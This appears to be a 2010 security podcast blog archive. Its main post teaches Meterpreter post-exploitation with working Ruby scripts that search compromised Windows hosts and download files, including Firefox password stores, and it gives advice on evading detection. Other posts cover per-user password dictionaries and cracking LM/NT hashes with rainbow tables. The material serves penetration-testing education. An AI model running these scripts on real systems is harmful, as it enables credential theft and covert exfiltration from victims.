August 2010 Archives

PaulDotCom Security Weekly - Episode 208 Part 1 - August 26, 2010


Yesterday Stephen Fewer committed to the development version of Metasploit code for the Windows version of Meterpreter for searching through the file system and using the index service of modern versions of Windows. The advantage of having this capability as part of the standard API is that the search is executed on the host and only matching entries are returned. Before this, all entries were returned and had to be evaluated on the attacker's machine; depending on the type of connection and the distance and path to the target, this is a very slow process and generates a lot of traffic that can give away the actions being taken.

Here is an example of a search using the method described before, taken from the enum_firefox script:

# Walk a directory tree the pre-search-API way: every entry is returned over
# the session and evaluated here on the attacker's side.
def frfxpswd(path,usrnm)
    @client.fs.dir.foreach(path) {|x|
        # Skip the . and .. entries the listing includes
        next if x =~ /^(\.|\.\.)$/
        fullpath = path + '\\' + x
        if @client.fs.file.stat(fullpath).directory?
            # Descend into subdirectories recursively
            frfxpswd(fullpath,usrnm)
        elsif fullpath =~ /(cert8.db|signons.sqlite|signons3.txt|key3.db)/i
            begin
                dst = x
                dst = @logs + ::File::Separator + usrnm + dst
                print_status("\tDownloading Firefox Password file to '#{dst}'")
                @client.fs.file.download_file(dst, fullpath)
            rescue
                print_error("\t******Failed to download file #{x}******")
                print_error("\t******Browser could be running******")
            end
        end
    }
end

As can be seen in the first six lines of the code, we have to use client.fs.dir.foreach and parse each entry, checking that it is not one of the . and .. entries that are returned; each remaining entry is then checked with client.fs.file.stat(fullpath).directory? to see if it is a directory or a file. If it is a directory, we call the function recursively to search that directory; when a file is found, its name is checked to see if it is the file we are looking for, and if it is we take the actions we want. This is very slow when we are dealing with a recursive search. Now, if we want to search for files that match a specific pattern, we can use client.fs.file.search(path,pattern,recursive). As you can see, we pass to this call the path from where to start the search (if we provide nil as the path it will search all drives), then the pattern to search for, and last whether we want the search to be recursive or not. This will return an array of hashes of what was found:

>> client.fs.file.search("c:\\","*.sys",false)
=> [{"name"=>"hiberfil.sys", "size"=>2139795456, "path"=>"c:"}, {"name"=>"pagefile.sys", "size"=>4284719104, "path"=>"c:"}]

As can be seen, the elements of the hash are name, path and size in bytes. If no file is found the length of the array will be 0; if a wrong path is provided, an operation error 3 will be raised:

>> client.fs.file.search("x:\\","*.sys",false)
Rex::Post::Meterpreter::RequestError: stdapi_fs_search: Operation failed: 3

One advantage of this call is that on recent versions of Windows, such as Vista, 7 and 2008, it will use the index service, which gives us the ability to search the Internet Explorer history and MAPI (email) entries, just by specifying iehistory as the search path for Internet Explorer history and mapi for email entries. The entries found are presented in the name element of the hash. One important note: when searching through the MAPI and Internet Explorer entries, a recursive search must be used. Now, if we want to use this from inside Meterpreter, we just use the search command:

meterpreter > search -h
Usage: search [-d dir] [-r recurse] -f pattern
Search for files.
OPTIONS:
-d <opt> The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f <opt> The file pattern glob to search for. (e.g. *secret*.doc?)
-h Help Banner.
-r <opt> Recursivly search sub directories. (Default: true)

The options are simple: with the -d option we specify the path, and if none is given it will search all drives on the target machine. With the -f option we provide the search glob that will be used to match which file information is returned to the attacker's machine, and the -r option, with a value of true or false, specifies whether the search will be recursive or not.

meterpreter > search -d c:\\ -f *.sys -r false
Found 2 results...
c:\hiberfil.sys (2139795456 bytes)
c:\pagefile.sys (4284719104 bytes)
meterpreter > 

Now let's create a small script to aid us in a pentest to find, select and download files from a target system.

Let's start by defining what we want the script to do:

· We have to be able to search for different things at once.

· We have to save the results to a file we can edit.

· We have to use the modified file to download those files we want.

· We have to provide a start directory for the search.

· We have to be able to control if the search will be recursive or not.

So let's start by declaring our variables and setting what the options of the script will be:

@client = client
location = nil
search_blob = []   # start empty so the length check on it is safe when -f is not given
input_file = nil
output_file = nil
recurse = false
logs = nil
@opts = Rex::Parser::Arguments.new(
    "-h" => [false, "Help menu." ],
    "-i" => [true, "Input file with list of files to download, one per line."],
    "-d" => [true, "Directory to start search on."],
    "-f" => [true, "Search blobs separated by a |."],
    "-o" => [true, "Output File to save the full path of files found."],
    "-r" => [false, "Search subdirectories."],
    "-l" => [true, "Location where to save the files."]
)

These variables will hold the values of the options:

· Location to hold the path of where the search will start.

· Search_blob to hold our search blobs.

· Input_file to hold the file that we will feed the script for download.

· Output_file to hold the name and location of the file we will write the results to.

· Recurse will be a Boolean value to determine if the search will be recursive or not.

· Logs to specify where the downloaded files will be saved to.

We add the customary usage function:

# Function for displaying help message
def usage
    print_line "Meterpreter Script for searching and downloading files that"
    print_line "match a specific pattern."
    print_line(@opts.usage)
    raise Rex::Script::Completed
end

Next we check the version of Meterpreter to make sure we are running on the Windows version and not the Java or PHP versions, which do not contain the search API call since it is not implemented in them.

# Check that we are running under the right type of Meterpreter; if not, show an error message.
# Also make sure we have arguments; if not, show the usage of the script.
if client.platform =~ /win32|win64/
    if args.length > 0
        …………
    else
        usage
    end
else
    print_error("This script is not supported on this version of Meterpreter.")
end

Once we have all of our checks in place we will parse the options and populate our variables with the information that we need to get our tasks done.

@opts.parse(args) { |opt, idx, val|
    case opt
    when "-h"
        usage
    when "-i"
        input_file = val
    when "-o"
        output_file = val
    when "-d"
        location = val
    when "-f"
        search_blob = val.split("|")
    when "-r"
        recurse = true
    when "-l"
        logs = val
    end
}

You will see that for the -f option we split the value given, which returns an array with each element containing one of the search strings we want to search for. Now that we have populated the variables with the values of the options passed to the script, we can perform the task we wrote the script for. The first thing we do is perform our search, making sure we provided a source directory and that our search blob array contains values.

# Search for files and save their location if specified
# (the nil check guards against -f not having been given)
if search_blob and search_blob.length > 0 and location
    search_blob.each do |s|
        print_status("Searching for #{s}")
        results = @client.fs.file.search(location,s,recurse)
        results.each do |file|
            print_status("\t#{file['path']}\\#{file['name']} (#{file['size']} bytes)")
            file_local_write(output_file,"#{file['path']}\\#{file['name']}") if output_file
        end
    end
end

As you can see, we only write the results to a file if an output file was provided; by using the file_local_write Meterpreter mixin we make sure that the file is created if it does not exist, which saves us from writing our own function for writing to a file. Now we add the code for reading our file back after we have edited it and decided which files we want to download.

# Read log file and download those files found
if input_file and logs
    if ::File.exist?(input_file)
        print_status("Reading file #{input_file}")
        # File.foreach closes the handle for us when the loop ends
        ::File.foreach(input_file) do |line|
            target = line.strip
            next if target.empty?   # skip blank lines left behind by editing
            print_status("Downloading #{target}")
            @client.fs.file.download(logs, target)
        end
    else
        print_error("File #{input_file} does not exist!")
    end
end

The script would be used to search for specific files. One thing to consider when searching is that searching the whole disk will cause I/O activity on the system that is bound to be detected if:

1. There is monitoring software in the case of servers.

2. A user is currently using the target machine.

So it is very important to check the idle time of the user on the box, and to check the processes and installed software on that box, to make sure your actions will not be detected if you run the search throughout the system. A targeted search of the user's profile is a better approach in the case of a desktop system, since Windows and applications tend to save most data in those folders; the get_env script can aid in identifying the location of these folders since it shows user and system environment variables. Also check the size of the files before downloading; you would not have much success trying to download a 2GB PST through a 300kb connection. I hope you found this blog post useful and informative.
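The result format and the size caveat above lend themselves to a small offline model. The following Ruby is an added example, not code from the post or from Metasploit: it replaces the client.fs.file.search call with a constructed result array in the same array-of-hashes shape, models the host-side glob matching with a glob_to_regex helper (assuming only * and ? are special, as in the search command's help), holds back files above a size cap before they reach the download list, and writes and re-reads the editable list that the -o and -i options exchange.

```ruby
# Added example (not from the original post or from Metasploit): an offline
# model of the search-and-select workflow, with the Meterpreter call replaced
# by constructed sample data so the selection logic can run without a session.
require 'tempfile'

# Constructed sample results in the exact shape client.fs.file.search returns:
# an Array of Hashes with "name", "size" (bytes) and "path" keys.
SAMPLE_RESULTS = [
  { "name" => "hiberfil.sys", "size" => 2_139_795_456, "path" => "c:" },
  { "name" => "pagefile.sys", "size" => 4_284_719_104, "path" => "c:" },
  { "name" => "budget.xlsx",  "size" => 48_213,        "path" => "c:\\Users\\alice\\Documents" },
  { "name" => "archive.pst",  "size" => 2_147_483_648, "path" => "c:\\Users\\alice\\Outlook" },
]

# Translate a search glob such as *secret*.doc? into an anchored, case-insensitive
# Regexp. Assumption: only * and ? are special, matching the search command's help.
def glob_to_regex(glob)
  escaped = Regexp.escape(glob).gsub('\*', '.*').gsub('\?', '.')
  Regexp.new("\\A#{escaped}\\z", Regexp::IGNORECASE)
end

# Full Windows path of a result, in the script's "#{path}\\#{name}" form.
def full_path(result)
  "#{result['path']}\\#{result['name']}"
end

# Apply the post's advice before anything is downloaded: keep only entries whose
# name matches the glob and whose size is at most max_bytes (the 2GB PST over a
# slow link problem). Returns [selected_paths, skipped_paths].
def select_downloads(results, glob, max_bytes)
  re = glob_to_regex(glob)
  selected, skipped = [], []
  results.each do |r|
    next unless r['name'] =~ re
    (r['size'] > max_bytes ? skipped : selected) << full_path(r)
  end
  [selected, skipped]
end

# Write full paths one per line, the format the -o option produces and the
# -i option reads back. Returns the number of entries written.
def write_list(path, entries)
  File.open(path, 'w') { |f| entries.each { |e| f.puts e } }
  entries.length
end

# Read the (possibly hand-edited) list back, ignoring blank lines and stray
# whitespace so an empty line never turns into a download request for "".
def read_list(path)
  File.foreach(path).map(&:strip).reject(&:empty?)
end

if __FILE__ == $0
  selected, skipped = select_downloads(SAMPLE_RESULTS, '*.*', 1_000_000_000)
  Tempfile.create('found') do |f|
    write_list(f.path, selected)
    puts "would download: #{read_list(f.path).inspect}"
    puts "held back as too large: #{skipped.inspect}"
  end
end
```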

Full script:

@client = client
location = nil
search_blob = []   # start empty so the length check below is safe when -f is not given
input_file = nil
output_file = nil
recurse = false
logs = nil
@opts = Rex::Parser::Arguments.new(
    "-h" => [false, "Help menu." ],
    "-i" => [true, "Input file with list of files to download, one per line."],
    "-d" => [true, "Directory to start search on."],
    "-f" => [true, "Search blobs separated by a |."],
    "-o" => [true, "Output File to save the full path of files found."],
    "-r" => [false, "Search subdirectories."],
    "-l" => [true, "Location where to save the files."]
)
# Function for displaying help message
def usage
    print_line "Meterpreter Script for searching and downloading files that"
    print_line "match a specific pattern."
    print_line(@opts.usage)
    raise Rex::Script::Completed
end
# Check that we are running under the right type of Meterpreter
if client.platform =~ /win32|win64/
    # Parse the options
    if args.length > 0
        @opts.parse(args) { |opt, idx, val|
            case opt
            when "-h"
                usage
            when "-i"
                input_file = val
            when "-o"
                output_file = val
            when "-d"
                location = val
            when "-f"
                search_blob = val.split("|")
            when "-r"
                recurse = true
            when "-l"
                logs = val
            end
        }
        # Search for files and save their location if specified
        if search_blob.length > 0 and location
            search_blob.each do |s|
                print_status("Searching for #{s}")
                results = @client.fs.file.search(location,s,recurse)
                results.each do |file|
                    print_status("\t#{file['path']}\\#{file['name']} (#{file['size']} bytes)")
                    file_local_write(output_file,"#{file['path']}\\#{file['name']}") if output_file
                end
            end
        end
        # Read log file and download those files found
        if input_file and logs
            if ::File.exist?(input_file)
                print_status("Reading file #{input_file}")
                # File.foreach closes the handle for us when the loop ends
                ::File.foreach(input_file) do |line|
                    target = line.strip
                    next if target.empty?   # skip blank lines left behind by editing
                    print_status("Downloading #{target}")
                    @client.fs.file.download(logs, target)
                end
            else
                print_error("File #{input_file} does not exist!")
            end
        end
    else
        usage
    end
else
    print_error("This script is not supported on this version of Meterpreter.")
end

Alright, so maybe Dan needs some other folks to help, and maybe they're not capable of resetting the internet per se, but regardless, we have Dan Kaminsky live on Episode 208 of PaulDotCom Security Weekly, at 7:30 PM EDT tomorrow night!


Carlos Perez will speak about his latest Ruby script for launching Karmetasploit type attacks in Backtrack!

Join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom (You will be required to register in order to chat in the channel, this is an anti-spam measure).

When active, the live stream(s) can be found at:

PaulDotCom Live! - You can watch the live video, listen, and chat during each episode! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/

PaulDotCom Icecast Radio (Audio Only)

Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!

- Paul "Salad Shooter" Asadoorian, Larry "HaxorTheMatrix" Pesce, Carlos "Dark 0perator" Perez, Darren "The Other Guy" Wigley, and John "The Father" Strand.

Episode 207 Show Notes

A few things happened in the world of info-sec, about 7.7 billion things, and we discuss them.


Hosts: Paul "PaulDotCom" Asadoorian, John Strand, Larry Pesce, Carlos Perez

Audio Feeds:

Episode 207 Show Notes

This time we have all the audio so I don't have to spend more time in the 'cage'. Smile for my temporary freedom as you listen to Chris Paget talk about his dreams to one day read RFID tags on the international space station while listening in on your phone conversations. Then enjoy as Ron Bowes talks about his password gathering efforts from Canada, eh.


Hosts: Paul "PaulDotCom" Asadoorian, John Strand, Larry Pesce, Carlos Perez

Audio Feeds:

Episode 206 Show Notes

Despite our audio failures we were able to rescue the Barnaby Jack interview. Blame the intern; they are expendable and easily replaceable. So please download this fine interview with Mr. Jack as he discusses his embedded systems work, and something about ATM machines that he spent some time on.


Hosts: Paul "PaulDotCom" Asadoorian, John Strand, Larry Pesce, Carlos Perez

Audio Feeds:

We have a special treat for Episode 207 of PaulDotCom Security Weekly! We'll have cellphone (in)security expert Chris Paget on to discuss his recent Defcon experiment on GSM cracking, as well as Ron "Facebook Hacker" Bowes providing a guest tech segment on cracking passwords. Both guests will be bringing the failboat to their respective targets at 7:30 PM EDT live tomorrow evening.


Join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom (You will be required to register in order to chat in the channel, this is an anti-spam measure).

When active, the live stream(s) can be found at:

PaulDotCom Live! - You can watch the live video, listen, and chat during each episode! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/

PaulDotCom Icecast Radio (Audio Only)

Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!

- Paul "Salad Shooter" Asadoorian, Larry "HaxorTheMatrix" Pesce, Carlos "Dark 0perator" Perez, Darren "The Other Guy" Wigley, John "The Father" Strand, and Mark "Quiet but Deadly" Baggett.

Episode 206 Show Notes

Dennis Brown tells us how he used the newly released Kismet for the QuahogCon Badge to spoof parts of the DefCon 18 Ninja Networks party badge. The hosts also discuss stories for this week. The intern makes lame excuses for his DefCon 18 party habits.


Hosts: Paul "PaulDotCom" Asadoorian, John Strand, Larry Pesce, Carlos Perez

Audio Feeds:

Creating per user customized dictionaries


Back in Episode 170 Larry talked about Reconnoiter. Reconnoiter was written by Jason Wood and builds a username list based upon linkedin.com profiles. After using the script on a recent penetration test I thought it would be nice if I also had a custom dictionary, like those created by CeWL, for each user at the company. So I wrote a script to create them and decided to share it with our listeners.

The intended use of userpass.py is to generate a customized password dictionary for every employee at a target company. You give it the name of your target company and it will give you a separate password file for each user at the company. In the demos I target individuals rather than companies, but you get the idea.

We cover userpass.py on episode 206, so download it and give it a go. If you want to try it out but you don't have CeWL installed yet, just add '-p "echo" ' to the end of your options.

Custom Per user password dictionaries from PaulDotCom on Vimeo.

Here is Jason Wood's script

Here is CeWL by Digininja

Join me in San Antonio for SANS 504 Hacker Techniques and Incident Response November 13-20th. Register Today


Come join the discussion with Barnaby Jack for Episode 206 of PaulDotCom Security Weekly, at 7:30 PM EDT live Thursday evening. Barnaby will be discussing one of the hottest demos at the recent Black Hat security conference where he demonstrated ATM "jackpotting".


"So Paul, what do you say to having Barnaby give you a hand with your ATM transactions from now on?"

Mark Baggett will also be discussing a new tool that he wrote, similar to CeWL, Mark's code will generate a custom password dictionary for a specified user using Social Networking sites!

Join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom (You will be required to register in order to chat in the channel, this is an anti-spam measure).

When active, the live stream(s) can be found at:

PaulDotCom Live! - You can watch the live video, listen, and chat during each episode! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/

PaulDotCom Icecast Radio (Audio Only)

Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!

- Paul "Salad Shooter" Asadoorian, Larry "HaxorTheMatrix" Pesce, Carlos "Dark 0perator" Perez, Darren "The Other Guy" Wigley, John "The Father" Strand, and Mark "Quiet but Deadly" Baggett.

This is a very different episode of our podcast. I wanted to take a moment to tell all of our listeners about a recent tragedy. Last Friday night Matthew Shoemaker, co-founder of the Infosec Daily podcast, passed away. Matthew left behind a wife and two children and will be missed greatly. I appeared on an episode of the ISD podcast, and had a fantastic time talking to Rick and Matt. In fact, Rick and Matt were scheduled to be on tonight's show. Instead, I'd like to take a moment to tell all of our listeners how they can donate to support Matt's family. Simply go to http://pauldotcom.com/shoemaker. This will re-direct you to a site where you can use Paypal to make a donation to Matt's family. While I didn't know Matt all that well, it was a great time when I appeared on his show and I know many are grieving his loss.

Matthew Shoemaker 1973 – 2010

Direct Audio Download

From all of us at PaulDotCom we extend our deepest sympathies.

PaulDotCom Security Weekly - Episode 204 - August 2, 2010


Our sincerest condolences go out to the friends and family of Matthew Shoemaker of the Infosec Daily Podcast. He will be missed for sure. We will dedicate a special episode to Matthew later this week.

Episode 204 Show Notes

Paul and John shoot the breeze on a lazy summer night and talk about Linux honeyports, vulnerability scanning vs. penetration testing, IPv6 host discovery, and attacking consumer devices.

* Sorry for the audio lag and weirdness; it will be better once the new studio is complete!

Plane ticket to Las Vegas: $500. Admission ticket to Defcon $140. Hotel room: $99/night. Admission to exclusive Ninja Networks party: $0. Passing out at party, getting your face written on, and having your picture taken with darktangent and others: Priceless.

Hosts: Paul "PaulDotCom" Asadoorian, John Strand

Audio Feeds:

Excellent Rainbow Tables Service


Last ShmooCon something wicked and evil happened. The fine folks on the PDC mailing list decided it would be a great idea to have a place at Shmoo where we could all meet up and share Rainbow Tables. What a grand idea! After all, good Rainbow Tables can easily go well into the hundreds of gigabits so why not have a nice get together and share?

Small problem. Everyone showed up with empty hard drives. No one, not a single person, brought any tables at all.

Zip.



Almost as crappy


Add to this the fact that my external hard drive with my Rainbow Tables crashed out on me last week. So, we now have two important lessons to take from the Rainbow Tables saga. Lesson one: no one is willing to share. Lesson two: backups are kind of important.

To remedy this situation I went to the fine people at Project Rainbow Crack and ordered a new set of tables for NT and LANMAN hashes. You may say that simply downloading them would be cheaper, and you would be right. However, we were in a bind on a current pen test and needed them immediately. Turns out it would be much faster to order them and have them shipped to us rather than download them.

I went to the section of the Project Rainbow Crack site to buy the tables and ordered the USD $300 set. What I would get is a new 320 GB hard drive and the 272 GB of tables for LM and NT hashes to go with it. What I was not expecting was that overnight air was included in the cost.

These guys simply rock. The service was excellent, and their packing... well, their packing was something that had to be seen to be believed.

As near as I could tell, it was wrapped in bubble wrap, 4 years of newspaper compressed to 1" around the entire drive, and the strongest tape known to man wrapped liberally around the drive.

First, I needed the right tools.

Hard Liquor Not Optional

Finally, I was able to squeeze the box out and see what was sent to me. It was an external hard drive. No Liquor to replenish my stock. It would have been better if there was alcohol in the package. For this reason, and this reason only, they get 4 out of 5 stars.


Everything was in its place. The tables, and the software to make them sing. I was a bit disappointed to see that only the programs for Windows were included. A bit of a bummer, but that is ok. There are plenty of places online to find Linux and OSX programs that work with the tables that were sent to me.

Oddly enough, the software was WinRAR protected with a password of "abcde12345". I am pretty sure this has something to do with crypto export controls. But it still made me chuckle.

How did they work? Beautifully. We were able to crack an Admin LANMAN password hash in under 5 min, and a NT only hash in under 15min.

When you get the tables there will be a couple of things that you will notice. First, the tables are in .rtc format. This is no big deal, except that other tools like Cain and Abel will need the tables to be in .rt format. The fine folks at Project Rainbow Crack have a few excellent tools to convert the formats here.

I cannot recommend the product from the fine folks at Project Rainbow Crack enough. The drive is ok, the service was prompt and the tables worked.

Also, I am currently backing up the tables to two different drives.

Next year I will be bringing some tables to share.

There are currently a number of great sites that offer free tables. Below are just a few:

http://www.freerainbowtables.com/

http://ophcrack.sourceforge.net/tables.php

Before you come to Shmoo get some tables and bring them to share with everyone else.

We will not have a repeat from last year.

-strandjs